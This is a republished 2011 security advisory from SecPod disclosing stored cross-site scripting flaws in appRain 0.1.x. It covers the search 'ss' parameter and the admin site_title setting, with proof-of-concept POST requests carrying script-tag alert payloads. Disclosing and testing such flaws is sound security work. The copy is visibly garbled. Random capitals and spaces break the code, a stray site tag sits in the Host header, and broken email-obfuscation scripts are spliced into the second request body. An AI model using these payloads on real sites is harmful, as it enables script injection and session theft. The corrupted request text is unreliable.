.
Author: Antu Sanadi from SecPod Technologies
Vendor: http://www.apprain.com/
Advisory: http://secpod.org/blog? P = 215
Http://secpod.org/advisories/SECPOD_AppRain_Multiple_XSS.txt
Version: appRain 0.1.4-Alpha and appRain-d-0.1.3
Date: 08/07/2011
######################################## #######################################
SecPod ID: 1015 01/05/2011 Issue Discovered
04/05/2011 Vendor Notified
No Response from the Vendor
08/07/2011 Advisory Released
Class: Cross-Site Scripting (Persistence) Severity: Medium
Overview:
---------
AppRain 0.1.4-Alpha (Quick Start Edition) and appRain-d-0.1.3 (Core Edition)
Multiple Persistence Cross-Site Scripting vulnerabilities.
Technical Description:
----------------------
(I) appRain 0.1.4-Alpha (Quick Start Edition) and appRain-d-0.1.3 (Core Edition) are
Prone to multiple persistence cross-site scripting vulnerabilities as it fails
To properly sanitise user-supplied input.
Input passed via the ss parameter in search action is not properly verified
Before it is returned to the user. This can be exploited to execute arbitrary
HTML and script code in a users browser session in the context of a vulnerable
Site. This may allow an attacker to steal cookie-based authentication
Credentials and launch further attacks.
Ii) Input passed via the data [sconfig] [site_title] parameter in/admin/config/general
Action is not properly verified before it is returned to the user. This can be
Exploited to execute arbitrary HTML and script code in a users browser session
In the context of a vulnerable site. This may allow an authinticated attacker
Launch further attacks.
NOTE: Authentication is required to exploit this vulnerability.
The vulnerability has been tested in appRain 0.1.4-Alpha (Quick Start Edition ),
AppRain-q-0.1.3 (Quick Start Edition), appRain-q-0.1.1 (Quick Start Edition ),
AppRain-d-0.1.3 (Core Edition) and appRain-d-0.1.2 (Core Edition), Other versions
May also be affected.
Impact:
--------
Successful exploitation cocould allow an attacker to execute arbitrary HTML
Code in a users browser session in the context of a vulnerable application.
Affected Software:
------------------
I) appRain 0.1.4-Alpha (Quick Start Edition) and prior.
Ii) appRain-d-0.1.3 (Core Edition) and prior.
AppRain 0.1.4-Alpha (Quick Start Edition) and prior.
Tested on,
PpRain 0.1.4-Alpha (Quick Start Edition ),
AppRain-q-0.1.3 (Quick Start Edition ),
AppRain-q-0.1.1 (Quick Start Edition ),
AppRain-d-0.1.3 (Core Edition) and
AppRain-d-0.1.2 (Core Edition)
References:
-----------
Http://www.apprain.com/
Http://secpod.org/blog? P = 215
Http://secpod.org/advisories/SECPOD_AppRain_Multiple_XSS.txt
Proof of Concept:
-----------------
POC 1:
-----
POST appRainq/search HTTP/1.1
Host: 192.168.1.17
User-Agent: appRain XSS test
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
Post Data:
----------
Ss = </title> <script> alert (SECPOD-XSS-TEST) </script>
POC 2:
-----
NOTE: Authentication is required to exploit this vulnerability.
POST appRainq/admin/config/general HTTP/1.1
Host: 192.168.1.17 (www.2cto.com)
User-Agent: appRain XSS test
Content-Type: application/x-www-form-urlencoded
Content-Length: 359
Post Data:
----------
Data [sconfig] [site_title] = <script> alert (SECPOD-XSS-TEST) </script> Export & data [sconfig] [copy_right_text] = xyz & data [sconfig] [admin_email] = a@ B .com <script type = "text/javascript">
/* <! [CDATA [*/
(Function () {try {var s, a, I, j, r, c, l = document. getElementById ("_ cf_email _"); a = l. className; if (a) {s =; r = parseInt (. substr (0, 2), 16); for (j = 2;. length-j; j + = 2) {c = parseInt (. substr (j, 2), 16) ^ r; s + = String. fromCharCode (c);} s = document. createTextNode (s); l. parentNode. replaceChild (s, l) ;}} catch (e ){}})();
/*]> */
</Script> & data [sconfig] [support_email] = B @c.com <script type = "text/javascript">
/* <! [CDATA [*/
(Function () {try {var s, a, I, j, r, c, l = document. getElementById ("_ cf_email _"); a = l. className; if (a) {s =; r = parseInt (. substr (0, 2), 16); for (j = 2;. length-j; j + = 2) {c = parseInt (. substr (j, 2), 16) ^ r; s + = String. fromCharCode (c);} s = document. createTextNode (s); l. parentNode. replaceChild (s, l) ;}} catch (e ){}})();
/*]> */
</Script> & data [sconfig] [corporate_email] = d@e.com <script type = "text/javascript">
/* <! [CDATA [*/
(Function () {try {var s, a, I, j, r, c, l = document. getElementById ("_ cf_email _"); a = l. className; if (a) {s =; r = parseInt (. substr (0, 2), 16); for (j = 2;. length-j; j + = 2) {c = parseInt (. substr (j, 2), 16) ^ r; s + = String. fromCharCode (c);} s = document. createTextNode (s); l. parentNode. replaceChild (s, l) ;}} catch (e ){}})();
/*]> */
</Script> & Button [button_save] = Save
Solution:
----------
Fix not available
Risk Factor:
-------------
CVSS Score Report:
ACCESS_VECTOR = NETWORK
ACCESS_COMPLEXITY = MEDIUM
AUTHENTICATION = REQUIRE
CONFIDENTIALITY_IMPACT = PARTIAL
INTEGRITY_IMPACT = PARTIAL
AVAILABILITY_IMPACT = NONE
EXPLOITABILITY = PROOF_OF_CONCEPT
REMEDIATION_LEVEL = UNAVAILABLE
REPORT_CONFIDENCE = CONFIRMED
CVSS Base Score = 5.5 (MEDIUM) (AV: N/AC: M/Au: S/C: P/I: P/A: N)
Credits:
--------
Antu Sanadi of SecPod Technologies has been credited with the discovery of this
Vulnerability.